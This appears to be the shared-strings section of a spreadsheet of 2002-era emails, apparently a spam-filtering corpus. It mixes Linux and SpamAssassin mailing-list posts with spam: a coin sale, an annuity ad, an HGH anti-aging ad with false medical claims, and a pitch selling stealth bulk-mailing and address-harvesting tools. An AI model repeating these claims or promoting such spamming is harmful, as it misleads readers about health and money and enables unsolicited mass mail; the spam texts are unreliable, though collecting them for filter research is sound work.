 mailto:affiliateoptout@btamail.net.cn?Subject=off
 arah
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 16 Sep 2002, Stephen D. Williams wrote:
 &gt; It's efficient-end, not low end.  At 1Million hour MTBF, 133MB/sec,
 &gt; and pretty good buffering and speed, the only thing going for SCSI is
 &gt; 15,000 RPM vs. 7200 and in a very small number of cases, slightly
 &gt; better scatter-gather.  (Actually, I think there might be a 15,000 RPM
 &gt; IDE now.)
 It's not just krpm, the desktop HDs have a higher failure rate. But I
 agree, EIDE has high density, and EIDE hardware RAID can offer SCSI a
 sound beating for reliability, performance, and storage density/rack units
 for the money, if designed for it, and if people would actually start 
 buying it.
 &gt; The other issues are pretty much non-issues: using multiple drives and
 &gt; controller contention (just use many IDE channels with extra PCI
 &gt; cards, up to 10 in some systems), and long cable runs (just split
 There are not all that many hard drives inside an 1U enclosure. Airflow
 blockage (you have to fit in 2-3x the number of SCSI disks with EIDE) will
 soon be a thing of the past due to SATA.
 &gt; storage between nodes).  Dual-port SCSI is also a non-issue since it
 &gt; is very expensive, doesn't work that well in practice because there
 &gt; are numerous secondary failure modes for shared disk systems, and
 &gt; because you still end up with a single point of failure.
 Since rack-space costs dominate, and our systems need more or less decent
 I/O we're going with 1U Dells with SCSI. The hard drive prices don't
 really make a visible difference, given the cost of the iron, and the
 rackspace/month. Plus, 1U Dells don't have any space left for lots of EIDE
 drives.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Adam dont job for no one, see.
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 4 Sep 2002, Tom wrote:
 &gt; A groys gesheft zol er hobn mit shroyre vus er hot, zol men bay im nit
 &gt; fregn, un vos men fregt zol er nisht hobn, and if that aint the truth
 &gt; nutin is.
 A nice curse. Don't get "shroyre", though.
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
 Vincent Cunniffe wrote:
 | Justin MacCarthy wrote:
 |
 |&gt; I think I'll ask this question again, as I sent on friday afternoon.
   :-)
 |
 |
 | Mailman ;-)
 |
 | Trust me, you do *not* want to running your own mailing lists
 | on your own software.
 |
 | You'll wind up crying in a dark room looking for something
 | high-voltage to stick your fingers into.
 All things considered, I get that effect with Mailman, but the viable
 alternatives are ezmlm, which is loonware and I'm avoiding on principle,
 and majordomo, which seems to have stagnated. Oh, and there's apparently
 something called SmartList which is a bitch to set up.
 Waider.
 - --
 waider@waider.ie / Yes, it /is/ very personal of me
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
 iQEVAwUBPXNE16HbXyzZsAb3AQH2KQf/XqeOMaHNXAlzbmgd5iYd9VQaAgWAR2DQ
 kdpz0NbECR2OS7PJoLY9lsPKgNshpJcDZIRsxJvXmfp5YRNq0AyP0HGGwRvWgjgB
 0N9HG/Rgez7S5RhU79RAuhpFb9XO1XzMI0gSkDHSGefQsUOAZ69vZVLLsiRiyHFy
 4u+vrPVTP0rYR7haX41JXu42GVWfT2K2DDFftAimqGCsJnu2MXcMI/Ptq1rtxhXD
 WZhxCR+FAwirEk8Yz9Drl8+gJL0YJQFSoWumQzqLKKutx1lJvv7OS4yDjGRaQpxm
 Jmq8lifudZayccbixx7ZcXMSlpP4C45Wj5XJSYW8RCjU1bgxTqhMbQ==
 =eG8X
 -----END PGP SIGNATURE-----
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Thanksgiving Sale
</t>
  </si>
  <si>
    <t xml:space="preserve">
 This is a multi-part message in MIME format.
 ------=_NextPart_000_0070_01C29634.08C7C1D0
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 We want to thank you for your past business and wish you and yours a =
 very Happy Thanksgiving Holiday this year.  As you know, Indians played =
 an important role in helping the pioneers find food and water.  No small =
 wonder they were honored on our nation's cents from 1859 to 1909 and =
 gold coins from 1854 to 1933.   As a way of giving thanks to our =
 customers, we just bought in a rare batch of 900 VF and XF Indian Cents =
 and are offering these on special for this week.  Nice mixture of dates =
 from the 1880s to 1909.   Our regular wholesale price for solid VF coins =
 is $1.95 and $6.00 for solid XF.
 For this week only, we are offering 10 different dates, VF or better, =
 for only $15 or 10 Different dates, solid XF or better, for only $45.  =
 Dealers/Investors - Buy a nice roll of 50, with at least 10 different =
 dates in each roll.  VF roll of 50, only $69.  XF roll of 50, only $195. =
  Limit: 5 rolls of each per customer at these low wholesale prices.    =20
 We also have some really nice Choice BU (MS 63 or better)  $21/2 Indian =
 Gold coins from 1908-1929 for only $395 each (our choice of date, but we =
 will pick out the best quality) 3 different for only $950 or 10 =
 different for $2,950.  Limit: 10 per customer. =20
 Please add $6 to help with postage and insurance on all orders. =20
 Thank you again,
 Cristina
 www.collectorsinternet.com
 P.S. One of our most popular items this month has been our wholesale=20
 bargain boxes, found half way down our homepage or at=20
 http://collectorsinternet.com/wholesalebargainbox.htm.  We are getting =
 many=20
 repeat orders from other dealers.  You can save time and postage by =
 adding=20
 this item, or any other items we have on sale to your other purchases, =
 as=20
 there is only a $6 postage and handling fee per order, regardless of =
 size.=20
 ------=_NextPart_000_0070_01C29634.08C7C1D0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;META content=3D"MSHTML 6.00.2722.900" name=3DGENERATOR&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=3D#ffffff&gt;
 &lt;DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;We want to thank you for your past =
 business and=20
 wish you and yours a very Happy Thanksgiving Holiday this year.&amp;nbsp; As =
 you=20
 know, Indians played an important role in helping the pioneers find food =
 and=20
 water.&amp;nbsp; No small wonder they were honored on our nation's cents =
 from 1859=20
 to 1909 and gold coins from 1854 to 1933.&amp;nbsp;&amp;nbsp; As&amp;nbsp;a way of =
 giving=20
 thanks to our customers, we just bought in a rare batch of 900&amp;nbsp;VF =
 and XF=20
 Indian Cents and are offering these on special for this week.&amp;nbsp; Nice =
 mixture=20
 of dates from the 1880s to 1909.&amp;nbsp;&amp;nbsp; Our regular wholesale price =
 for=20
 solid VF coins is $1.95&amp;nbsp;and $6.00 for solid XF.&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;For this week only, we are offering 10 =
 different=20
 dates, VF or better,&amp;nbsp;for only $15 or 10 Different dates, solid XF =
 or=20
 better,&amp;nbsp;for only $45.&amp;nbsp; &lt;/FONT&gt;&lt;FONT face=3DArial=20
 size=3D2&gt;Dealers/Investors - Buy a nice roll of 50, with at least 10 =
 different=20
 dates in each roll.&amp;nbsp; VF roll of 50, only $69.&amp;nbsp; XF roll of 50, =
 only=20
 $195.&amp;nbsp; Limit:&amp;nbsp;5 rolls of each per customer at these low =
 wholesale=20
 prices.&amp;nbsp; &amp;nbsp;&amp;nbsp; &lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;We also have some really =
 nice&amp;nbsp;Choice BU (MS 63=20
 or better) &amp;nbsp;$21/2 Indian Gold coins from 1908-1929&amp;nbsp;for only =
 $395 each=20
 (our choice of date, but we will pick out the best quality) 3 different =
 for only=20
 $950 or 10 different for $2,950.&amp;nbsp;&amp;nbsp;Limit: 10 per =
 customer.&amp;nbsp;=20
 &lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;Please add $6 to help with postage and =
 insurance on=20
 all orders.&amp;nbsp; &lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;Thank you again,&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;Cristina&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;A=20
 href=3D"http://www.collectorsinternet.com"&gt;www.collectorsinternet.com&lt;/A&gt;=
 &lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;P.S. One of our most popular items this =
 month has=20
 been our wholesale &lt;BR&gt;bargain boxes, found half way down our homepage =
 or at=20
 &lt;BR&gt;&lt;/FONT&gt;&lt;A =
 href=3D"http://collectorsinternet.com/wholesalebargainbox.htm"&gt;&lt;FONT=20
 face=3DArial=20
 size=3D2&gt;http://collectorsinternet.com/wholesalebargainbox.htm&lt;/FONT&gt;&lt;/A&gt;=
 &lt;FONT=20
 size=3D2&gt;&lt;FONT face=3DArial&gt;. &amp;nbsp;We are getting many &lt;BR&gt;repeat =
 orders from other=20
 dealers. &amp;nbsp;You can save time and postage by adding &lt;BR&gt;this item, or =
 any=20
 other items we have on sale to your other purchases, as &lt;BR&gt;there is =
 only a $6=20
 postage and handling fee per order, regardless of size.&lt;/FONT&gt;=20
 &lt;/FONT&gt;&lt;BR&gt;&lt;/DIV&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 ------=_NextPart_000_0070_01C29634.08C7C1D0--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Ultimate HGH: Make you look and feel 20 YEARS YOUNGER!15373
</t>
  </si>
  <si>
    <t xml:space="preserve">As seen on NBC, CBS, CNN, and even Oprah! The health discovery that actuallyreverses aging while burning fat, without dieting or exercise! This provendiscovery has even been reported on by the New England Journal of Medicine.Forget aging and dieting forever! And it's Guaranteed! 
 Click below to enter our web site:
 http://www205.wiildaccess.com/hgh/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Click below to enter our web site:
 http://www205.wiildaccess.com/hgh/
 **************************************************
 If you want to get removed
 from our list please email at- standardoptout@x263.net (subject=remove "your email")
 **************************************************
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAdev] 2.42 to come ?
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wednesday 11 September 2002 16:19 CET Justin Mason wrote:
 &gt; Malte S. Stretz said:
 &gt;[...]
 &gt; &gt; I think we should even add new (GA'd) rules to 2.4x (and/or remove old
 &gt; &gt; ones) and tag a new 2.50 only if we have a bunch of features worth a
 &gt; &gt; "dangerous" big update. I'd say: Yes, you should expect 2.42 and also
 &gt; &gt; 2.43+ (but update to 2.41 now).
 &gt;
 &gt; I would think adding new rules to, or removing broken rules from, 2.4x
 &gt; would require some discussion first.  but new GA'd scores are definitely
 &gt; worth putting in, as the ones there are too wild.
 I think my mail wasn't very clear ;-) My point was that we should continue 
 releasing new rules and removing broken ones (all based on discussions on 
 this list of course) in the 2.4 branch instead of creating a new 2.5 branch 
 everytime we have a bunch of new rules.
 A new branch should be openend only if (big) new features are introduced 
 (eg. Bayes) or the interface has changed (spam_level_char=x). As the rules 
 are under fluent development, the user has to update quite regularly. But 
 currently he couldn't be shure if the new release will break anything in 
 his setup (like -F going away). So if we say "the branches are stable to 
 the outside and just improved under the surface but you have to watch out 
 when you update to a new minor version number", users and sysadmins could 
 be less reluctant to update.
 All just IMHO :o)
 Malte
 P.S.: I'll be away from my box and my mail account for one week, starting 
 tomorrow. So happy coding for the next week :-)
 -- 
 --- Coding is art.
 -- 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SACVS] CVS: spamassassin/lib/Mail/SpamAssassin Conf.pm,1.91.2.7,1.91.2.8
</t>
  </si>
  <si>
    <t xml:space="preserve">Update of /cvsroot/spamassassin/spamassassin/lib/Mail/SpamAssassin
 In directory usw-pr-cvs1:/tmp/cvs-serv17809/lib/Mail/SpamAssassin
 Modified Files:
       Tag: b2_4_0
 	Conf.pm 
 Log Message:
 added deprecation regarding starting line with space; reserved for future use; also changed sample version_tag
 Index: Conf.pm
 ===================================================================
 RCS file: /cvsroot/spamassassin/spamassassin/lib/Mail/SpamAssassin/Conf.pm,v
 retrieving revision 1.91.2.7
 retrieving revision 1.91.2.8
 diff -b -w -u -d -r1.91.2.7 -r1.91.2.8
 --- Conf.pm	29 Aug 2002 14:52:43 -0000	1.91.2.7
 +++ Conf.pm	4 Sep 2002 15:22:39 -0000	1.91.2.8
 @@ -24,8 +24,11 @@
  files, loaded from the /usr/share/spamassassin and /etc/mail/spamassassin
  directories.
 -The C&lt;#&gt; character starts a comment, which continues until end of line,
 -and whitespace in the files is not significant.
 +The C&lt;#&gt; character starts a comment, which continues until end of line.
 +
 +Whitespace in the files is not significant, but please note that starting a
 +line with whitespace is deprecated, as we reserve its use for multi-line rule
 +definitions, at some point in the future.
  Paths can use C&lt;~&gt; to refer to the user's home directory.
 @@ -257,7 +260,7 @@
  eg.
 -  version_tag perkel2    # version=2.40-perkel2
 +  version_tag myrules1    # version=2.41-myrules1
  =cut
 -------------------------------------------------------
 This sf.net email is sponsored by: OSDN - Tired of that same old
 cell phone?  Get a new here for FREE!
 https://www.inphonic.com/r.asp?r=sourceforge1&amp;refcode1=vs3390
 _______________________________________________
 Spamassassin-commits mailing list
 Spamassassin-commits@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-commits
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [SAtalk] Too funny
</t>
  </si>
  <si>
    <t xml:space="preserve">| 
 | 0 hits here. :(
 | 
 I also get a lot of them. I think they're using the domain registry
 database to pull their victims' addresses.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</si>
  <si>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The Inflation Fighter
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_68D343_01C210A5.CE2C4050
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  FIGHT INFLATION!	
  It's tame...	 ...for now.	
  The new SPIA Inflation Fighter!
 Immediate Annuity Payments that increase 
 each year, to keep pace with inflation 	
   _____  
   	Single Premium Immediate Annuity	 
   	Medicaid Friendly 	
   	Commissions Ranging from 4 to 7%	 
   	Payment Increases 5, 10, 15% Per Year	 
   _____  
 Call or e-mail &lt;mailto:standardlife@smancorp.com&gt;  us Today!
  Call us at 800-767-7749
 ? or ?
 Please fill out the form below for more information	 
 Name:	  	
 E-mail:	  	
 Phone:	  	
 City:	  	State:	  	 	
  &lt;http://www.standardlifeofindiana.com&gt;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------=_NextPart_000_68D343_01C210A5.CE2C4050
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;The Inflation Fighter&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;table width=3D"550" cellpadding=3D"0" cellspacing=3D"0" =
 align=3D"center" bgcolor=3D"#FFFFFF"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;
       &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
         &lt;tr&gt;=20
           &lt;td colspan=3D"2"&gt;&lt;img =
 src=3D"http://iiq.us/images/slii/20020604-101.gif" width=3D"550" =
 height=3D"74" alt=3D"FIGHT INFLATION!"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;img src=3D"http://iiq.us/images/slii/20020604-102.jpg" =
 width=3D"275" height=3D"421" alt=3D"It's tame..."&gt;&lt;/td&gt;
           &lt;td&gt;&lt;img src=3D"http://iiq.us/images/slii/20020604-103.jpg" =
 width=3D"275" height=3D"421" alt=3D"...for now."&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table width=3D"100%" cellpadding=3D"2" cellspacing=3D"2" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;img src=3D"http://iiq.us/images/slii/20020604-2.gif" =
 width=3D"540" height=3D"92" alt=3D"The new SPIA Inflation Fighter!"&gt;&lt;br&gt;
             &lt;b&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"4"&gt;
             Immediate Annuity Payments that increase &lt;br&gt;
             each year, to keep pace with inflation &lt;/font&gt;&lt;/b&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;=20
             &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
               &lt;tr&gt;=20
                 &lt;td colspan=3D"2"&gt;=20
                   &lt;hr width=3D"90%" size=3D"1" color=3D"#000000"&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"16%" height=3D"30" align=3D"right" =
 valign=3D"middle"&gt;&lt;img src=3D"http://iiq.us/images/slii/20020604-3.gif" =
 width=3D"17" height=3D"17"&gt;&lt;img =
 src=3D"http://iiq.us/images/slii/spacer.gif" width=3D"4" =
 height=3D"1"&gt;&lt;/td&gt;
                 &lt;td width=3D"84%"&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif"&gt;Single Premium Immediate Annuity&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;
                 &lt;td width=3D"16%" height=3D"30" align=3D"right" =
 valign=3D"middle"&gt;&lt;img src=3D"http://iiq.us/images/slii/20020604-3.gif" =
 width=3D"17" height=3D"17"&gt;&lt;img =
 src=3D"http://iiq.us/images/slii/spacer.gif" width=3D"4" =
 height=3D"1"&gt;&lt;/td&gt;
                 &lt;td width=3D"84%"&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif"&gt;Medicaid Friendly &lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"16%" height=3D"30" align=3D"right" =
 valign=3D"middle"&gt;&lt;img src=3D"http://iiq.us/images/slii/20020604-3.gif" =
 width=3D"17" height=3D"17"&gt;&lt;img =
 src=3D"http://iiq.us/images/slii/spacer.gif" width=3D"4" =
 height=3D"1"&gt;&lt;/td&gt;
                 &lt;td width=3D"84%"&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif"&gt;Commissions Ranging from 4 to 7%&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"16%" height=3D"30" align=3D"right" =
 valign=3D"middle"&gt;&lt;img src=3D"http://iiq.us/images/slii/20020604-3.gif" =
 width=3D"17" height=3D"17"&gt;&lt;img =
 src=3D"http://iiq.us/images/slii/spacer.gif" width=3D"4" =
 height=3D"1"&gt;&lt;/td&gt;
                 &lt;td width=3D"84%"&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif"&gt;Payment Increases 5, 10, 15% Per Year&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td colspan=3D"2"&gt;=20
                   &lt;hr width=3D"90%" size=3D"1" color=3D"#000000"&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;&lt;b&gt;Call or=20
             &lt;a href=3D"mailto:standardlife@smancorp.com"&gt;e-mail&lt;/a&gt; us =
 Today!&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/slii/20020604-4.gif" =
 width=3D"530" height=3D"94" alt=3D"Call us at 800-767-7749"&gt;=20
             &lt;br&gt;
             &amp;#151; or &amp;#151;&lt;br&gt;
             &lt;table width=3D"100%" bgcolor=3D"#000000"&gt;
               &lt;tr&gt;=20
                 &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                   &lt;td&gt;=20
                     &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"2" align=3D"center" bgcolor=3D"#ffffff"&gt;
                       &lt;tr&gt;=20
                         &lt;td colspan=3D"5" align=3D"center" =
 bgcolor=3D"#000066"&gt;&lt;b&gt;&lt;font color=3D"#FFFFFF" size=3D"2"&gt;Please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value=3D"standardlife@smancorp.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"SLI Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;br&gt;
             &lt;a href=3D"http://www.standardlifeofindiana.com"&gt;&lt;img =
 src=3D"http://iiq.us/images/sli3/20011126-5.jpg" width=3D"387" =
 height=3D"88" border=3D"0"&gt;&lt;/a&gt;=20
             &lt;br&gt;
             &lt;/b&gt;&lt;/font&gt;&amp;nbsp;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&lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_68D343_01C210A5.CE2C4050--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] My razor identity reputation score
</t>
  </si>
  <si>
    <t xml:space="preserve">As I understand it - the central database keeps a score of a reporters 
 electronic "reputation". Is there any way for me to read this? I want to 
 be able to tell how many messages I sent and if there were any revokes?
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: dylsexics of the wrold, untie!
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; (and no it wasnt me even though the spellingis
 &gt; oddly familar)
 Not that this is news to FoRKs, but:
 &lt;http://www.j-bradford-delong.net/movable_type/archives/000393.html&gt;
 &gt; ... randomising letters in the middle of words [has] little or no
 &gt; effect on the ability of skilled readers to understand the text. This
 &gt; is easy to denmtrasote. In a pubiltacion of New Scnieitst you could
 &gt; ramdinose all the letetrs, keipeng the first two and last two the same,
 &gt; and reibadailty would hadrly be aftcfeed. My ansaylis did not come
 &gt; to much beucase the thoery at the time was for shape and senqeuce
 &gt; retigcionon.  Saberi's work sugsegts we may have some pofrweul palrlael
 &gt; prsooscers at work. The resaon for this is suerly that idnetiyfing
 &gt; coentnt by paarllel prseocsing speeds up regnicoiton. We only need
 &gt; the first and last two letetrs to spot chganes in meniang.
 -Dave
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
 I'm a college dropout.  I work about two hours a day.  
 I'm ambitious, but extremely lazy, and I make over 
 $250,000 a year.  Are you curious yet?
 In a minute I'm going to tell you my secret,
 it's the dirty little secret of the Internet ...
 You've probably heard stories about people making
 whopping huge money online, but you thought they 
 were the big corporate execs, famous programmers, or
 boy-geniuses.
 Well, grasshopper, think again ...
 It's people like you and me that are making the real
 money.  Yep, people like YOU AND ME!
 Ever since the "dot com bubble" burst in 1999, small-time
 entrepreneurs are getting richer while the Fortune 500 
 companies look for bankruptcy lawyers.
 Today small business owners and ordinary folks 
 like you and me can use the web to achieve complete 
 financial freedom with NO INVESTMENT and very little 
 work.  How?  By learning the most profitable marketing 
 technique ever created - it's called BULK EMAIL.
 If you've ever recieved an email advertisement, then 
 you know what bulk email is.  I bet you can't click on 
 DELETE fast enough for most of those ads, right?
 You might not want their product, but remember that 
 thousands of other folks probably do.  Bulk email is a 
 percentage game - every bulker who contacts you 
 makes a six figure income on the Internet.  I 
 guarantee it.  Now let's go back to Math 101 and 
 review some numbers ...
 If you sell on eBay, you pay anywhere from a few
 dollars to over a hundred dollars just to post one
 auction.  How many people see your ad?  Maybe a
 couple thousand or even ten or twenty thousand
 over a period of days.  Using bulk email, YOU CAN
 SEND YOUR AD TO MORE THAN A MILLION PEOPLE A DAY
 at virtually no cost.  Whether your send 100,000
 emails or 100 million emails, the price is the same.
 ZERO!
 Stop paying those outrageous auction listing fees when
 hardly anyone sees your ad!
 Imagine that you have a decent product with a 
 profit margin of $20.00 on each sale.  If you send 
 an email ad to 500,000 people, and only one person 
 in a thousand actually places an order, then you just 
 generated 500 orders and made $10,000 in a few hours 
 of work.  
 It's that simple ...
 All you have to do is convince ONE PERSON OUT OF A
 THOUSAND to buy your stuff and you're FILTHY RICH.
 The best thing is that anyone can do it.  Doesn't 
 matter if you're a nineteen-year-old college student 
 using a dorm-room computer or a fifty-year-old 
 executive working from an office building in New 
 York City.  Anyone, and I repeat ANYONE, can start 
 bulk emailing with virtually no startup costs.  All 
 it takes is a  few days of study, plenty of ambition, 
 and some basic familiarity with the Internet.
 I quit college when I was 19 to capitalize on the 
 "Dot Com" mania, and I've never looked back.  I 
 started with no money, no product to sell, and only 
 the most rudimentary computer skills.  I saw an 
 opportunity and I seized it.  A few years later, 
 I bought my own home - with CASH.  
 You don't need any money.  You don't need a product.
 You don't need to be a computer nerd and no experience
 whatsoever is required.  
 If you saw an employment ad in the newspaper like that
 you'd jump right on it.  It would be a dream come true.
 So what are you waiting for?!
 I'm going to ask you four simple questions.  If you answer
 YES to all of them, then I can almost promise that you
 will make at least $100,000 using bulk email this year.
 Here goes ...
 Do you have basic experience with the web? 
 Do you have a computer and an Internet connection?
 Do you have a few hours each day of free time?  
 Do you want to earn some extra money with an eye towards 
 complete financial freedom?  
 If you answer YES to these questions, you could be
 making $5,000 - $20,000 per week working from your 
 home.  Kiss your day job goodbye - this sure beats 
 the 9-5 daily grind!
 All you need is ambition and commitment.  This
 is no "get rich quick scheme".  You have to work
 to make big bucks, but ANYONE - and I mean ANYONE - can do 
 it.
 You're probably wondering if it's hard to get started.  
 Don't worry, it's not! I will show you step-by-step 
 how to start your first email campaign and how to
 build a booming online business.  You'll be generating 
 orders - AND MAKING MONEY - in less than seven days.
 Okay, so what if you don't have anything to sell?
 No problem!!  I'll show you where to find hot
 products that sell like CRAAAAAAZY! Most people delay
 starting an Internet business because they have 
 nothing to sell, but I'm removing that hurdle right now.  
 After reading the Bulkbook, you can build your complete 
 product line in less than two hours!  There is NO EXCUSE 
 not to get started! I will get you up-and-running within 
 seven days. In fact ...
 I personally guarantee that you will start your own 
 bulk email campaign less than a week after reading 
 the Bulkbook!  I'll give you a toll-free phone number 
 to reach me 24 hours a day, seven days a week; 
 where else will you find that level of service?!
 I will also include a step-by-step guide to starting 
 your very first email campaign called "Seven Days to 
 Bulk Email Success".  This seperate guide contains a daily 
 routine for you to follow with specific, exact 
 instructions on how to get started.  On day one, for 
 example, I teach you where to find a product to sell. 
 The next day you learn how to build a fresh mailing 
 list.  On the seventh day, you just click send!  Your 
 very first campaign is ready to go.
 As a special bonus, you'll recieve a FREE copy 
 of our STEALTH MASS MAILER, a very powerful bulk 
 email program which retails for $49.99! I'll even
 include 7 million email addresses absolutely FREE
 if you order NOW!
 Stop wasting your money on auction listing fees, 
 classifieds, and banner ads - they don't work, and 
 never will!  If you are SERIOUS about making money 
 on the Internet, bulk email is your only option.  
 What are you waiting for?  Few of us are willing 
 to share this knowledge, but I promise to teach 
 you everything I know about bulk emailing in this 
 extraordinary bulk emailer's handbook ... The Bulkbook! 
 Once again, here's the deal.  You give me $29.99.  
 I give you ALL THE TOOLS YOU NEED to become a
 successful, high profit bulk emailer.  INCLUDING:
 ** THE BULKBOOK
 Teaches you step-by-step how to become a high profit
 bulk emailer.  Secret techniques and tips never
 before revealed.
 ** SEVEN DAYS TO BULK EMAIL SUCCESS
 Provides detailed day-by-day instruction to start sending
 your first email campaign in seven days.
 ** 600 Email subjects that PULL LIKE CRAZY
 ** EMAIL LIST MANAGER
 Manage your email lists quickly and easily.  Very 
 user-friendly, yet powerful, software.
 ** STEALTH MASS MAILER
 Software can send up to 50,000 emails an hour automatically.
 Just load them in there and click SEND!
 ** ADDRESS ROVER 98 and MACROBOT SEARCH ENGINE ROBOT
 Extracts email addresses from databases and search engines
 at speeds of over 200,000 per hour.
 ** WORLDCAST EMAIL VERIFIER
 Used to verify your email addresses that you extract to 
